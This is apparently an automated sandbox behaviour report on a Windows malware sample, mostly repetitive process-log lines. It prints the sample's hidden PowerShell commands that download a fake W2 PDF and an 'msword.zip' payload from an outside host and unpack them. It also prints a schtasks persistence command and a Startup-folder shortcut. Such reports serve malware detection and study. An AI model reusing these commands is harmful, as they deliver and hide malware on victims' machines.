Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 12_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

12_2_004062FC

Source: msword.exe.10.dr

Static PE information: real checksum: 0x1511d0 should be: 0x157da2

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B20DE6 push ecx; ret

38_2_00B20DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	File created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	File created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B926DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		38_2_00B926DD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B1FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		38_2_00B1FC7C

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
